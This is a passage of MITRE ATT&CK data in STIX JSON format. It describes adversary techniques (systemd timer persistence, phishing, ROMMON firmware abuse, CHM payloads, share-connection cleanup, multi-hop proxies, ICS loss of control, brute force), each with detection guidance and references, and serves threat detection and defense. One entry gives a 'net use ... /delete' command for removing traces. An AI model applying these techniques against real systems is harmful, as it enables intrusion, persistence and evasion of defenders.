10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["SarathKumar Rajendran, Trimble Inc"], "x_mitre_deprecated": false, "x_mitre_detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers \u2013all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "root"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "created": "2020-10-12T17:50:31.584Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/006", "external_id": "T1053.006"}, {"source_name": "Systemd Remote Control", "description": "Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.", "url": "https://www.tecmint.com/control-systemd-services-on-remote-linux-server/"}, {"source_name": "archlinux Systemd Timers Aug 2020", "description": "archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.", "url": "https://wiki.archlinux.org/index.php/Systemd/Timers"}, {"source_name": "gist Arch package compromise 10JUL2018", "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a"}, {"source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018", "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/"}, {"source_name": "acroread package compromised Arch Linux Mail 8JUL2018", "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html"}, {"source_name": "Falcon Sandbox smp: 28553b3a9d", "description": "Hybrid Analysis. (2018, July 11). HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7. Retrieved September 8, 2023.", "url": "https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300"}, {"source_name": "Linux man-pages: systemd January 2014", "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", "url": "http://man7.org/linux/man-pages/man1/systemd.1.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-01T16:56:32.245Z", "name": "Phishing", "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Philip Winther", "Ohad Zaidenberg, @ohad_mz", "Liora Itkin", "Liran Ravich, CardinalOps", "Scott Cook, Capital One"], "x_mitre_deprecated": false, "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "SaaS", "Office 365", "Google Workspace"], "x_mitre_version": "2.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "created": "2020-03-02T18:45:07.892Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1566", "external_id": "T1566"}, {"source_name": "ACSC Email Spoofing", "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"}, {"source_name": "CISA Remote Monitoring and Management Software", "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a"}, {"source_name": "cyberproof-double-bounce", "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.", "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"}, {"source_name": "Unit42 Luna Moth", "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.", "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/"}, {"source_name": "Microsoft Anti Spoofing", "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"}, {"source_name": "Microsoft OAuth Spam 2022", "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"}, {"source_name": "sygnia Luna Month", "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.", "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams"}, {"source_name": "Proofpoint-spoof", "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.", "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing"}, {"source_name": "Palo Alto Unit 42 VBA Infostealer 2014", "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.", "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Graphical User Interface", "description": "**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**\n\nThe Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. \n\nUnknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "2.0", "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a6525aec-acc4-47fe-92f9-b9b4de4b9228", "created": "2017-05-31T21:30:50.342Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1061", "external_id": "T1061"}, {"source_name": "Wikipedia Run Command", "description": "Wikipedia. (2018, August 3). Run Command. Retrieved October 12, 2018.", "url": "https://en.wikipedia.org/wiki/Run_command"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "ROMMONkit", "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", "created": "2020-10-20T00:05:48.790Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1542/004", "external_id": "T1542.004"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-18T16:31:56.936Z", "name": "Compiled HTML File", "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "created": "2020-01-23T18:53:54.377Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/001", "external_id": "T1218.001"}, {"source_name": "Microsoft CVE-2017-8625 Aug 2017", "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.", "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625"}, {"source_name": "Microsoft HTML Help May 2018", "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk"}, {"source_name": "Microsoft HTML Help Executable Program", "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.", "url": "https://msdn.microsoft.com/windows/desktop/ms524405"}, {"source_name": "Microsoft HTML Help ActiveX", "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.", "url": "https://msdn.microsoft.com/windows/desktop/ms644670"}, {"source_name": "MsitPros CHM Aug 2017", "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM \u2013 CVE-2017-8625. Retrieved October 3, 2018.", "url": "https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Network Share Connection Removal", "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_system_requirements": ["Established network share connection to a remote system. Level of access depends on permissions of the account used."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "created": "2020-01-31T12:39:18.816Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/005", "external_id": "T1070.005"}, {"source_name": "Technet Net Use", "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", "url": "https://technet.microsoft.com/bb490717.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T13:24:36.872Z", "name": "Multi-hop Proxy", "description": "Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.\n\nFor example, adversaries may construct or use onion routing networks \u2013 such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network \u2013 to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)\n\nIn the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization\u2019s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.\n\nSimilarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Eduardo Chavarro Ovalle"], "x_mitre_deprecated": false, "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "created": "2020-03-14T23:23:41.770Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1090/003", "external_id": "T1090.003"}, {"source_name": "NGLite Trojan", "description": "Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.", "url": "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"}, {"source_name": "Onion Routing", "description": "Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.", "url": "https://en.wikipedia.org/wiki/Onion_routing"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:08.613Z", "name": "Loss of Control", "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Dragos Threat Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0827", "external_id": "T0827"}, {"source_name": "BSI State of IT Security 2014", "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3"}, {"source_name": "Corero", "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"}, {"source_name": "Michael J. Assante and Robert M. Lee", "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"}, {"source_name": "Tyson Macaulay", "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Change Program State", "description": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0875", "external_id": "T0875"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-29T18:53:26.593Z", "name": "Brute Force", "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["David Fiser, @anu4is, Trend Micro", "Alfredo Oliveira, Trend Micro", "Magno Logan, @magnologan, Trend Micro", "Yossi Weizman, Azure Defender Research Team", "Ed Williams, Trustwave, SpiderLabs", "Mohamed Kmal"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "2.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "created": "2017-05-31T21:31:22.767Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1110", "external_id": "T1110"}, {"source_name": "TrendMicro Pawn Storm Dec 2020", "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html"}, {"source_name": "Dragos Crashoverride 2018", "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"}], "object_marking_refs": 